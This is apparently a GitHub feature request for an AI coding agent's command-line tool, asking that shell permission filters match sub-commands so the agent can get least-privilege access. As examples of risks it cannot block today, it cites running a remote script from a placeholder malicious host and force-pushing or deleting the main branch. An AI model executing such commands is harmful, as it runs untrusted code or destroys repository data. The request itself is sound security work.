Feature Request: Support sub-command granularity in --allow-tool shell filter #2037
Description
Describe the feature or problem you'd like to solve
--allow-tool="shell(deno:*)" allows any deno sub-command with no way to restrict to specific ones (e.g. only deno task), making least-privilege shell access impossible.
Proposed solution
Feature Request
Summary
Allow --allow-tool shell filters to match sub-commands, not just the base command.
Current Behavior
--allow-tool="shell(deno:*)" permits any deno command (e.g. deno run, deno task, deno eval, etc.) without finer control.
Desired Behavior
Support a sub-command syntax such as:
--allow-tool="shell(deno task:*)"
This would allow only deno task <anything> while blocking other deno sub-commands like deno run or deno eval.
Use Case
When running in a project with a deno.json task runner, I want the agent to be allowed to execute predefined tasks (deno task build, deno task test) but not arbitrary deno run commands, which could execute untrusted scripts.
Proposed Syntax
shell(deno:*)— current behavior, matches anydeno ...shell(deno task:*)— new, matches onlydeno task ...shell(git commit:*)— another example, matches onlygit commit ...
Example prompts or workflows
-
--allow-tool="shell(deno task:*)"
Allow only predefined tasks (deno task build, deno task test) while blocking
deno run, deno eval, etc.
⚠️ Today: deno run https://malicious.example/script.ts cannot be blocked
if deno task is needed. -
--allow-tool="shell(git commit:)" --allow-tool="shell(git push:)"
Permit only committing and pushing, preventing branch deletion or force-push.
⚠️ Today: git branch -D main or git push --force cannot be blocked
if any git command is needed. -
--allow-tool="shell(npm run:*)" Restrict to npm scripts defined in package.json, blocking npm install or
arbitrary package execution.
⚠️ Today: npm install cannot be blocked
if npm run is needed.
Additional context
No response